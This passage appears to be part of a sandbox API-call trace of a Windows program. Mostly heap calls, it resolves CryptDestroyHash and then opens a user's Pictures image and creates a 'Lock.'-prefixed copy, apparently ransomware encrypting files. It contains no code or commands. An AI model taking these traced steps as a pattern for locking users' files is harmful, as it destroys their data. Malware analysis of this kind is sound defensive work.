hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.430] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.430] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.430] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.431] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.431] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.432] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0256.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.432] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.433] CryptDestroyHash (hHash=0xaa5860) returned 1 [0256.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.443] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.447] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.447] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.447] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.447] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/SLYhvryE1GJ5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\slyhvrye1gj5.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0256.449] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0256.449] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0256.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0256.449] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.449] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.449] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.SLYhvryE1GJ5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.slyhvrye1gj5.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0256.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0256.450] PeekMessageW (in: 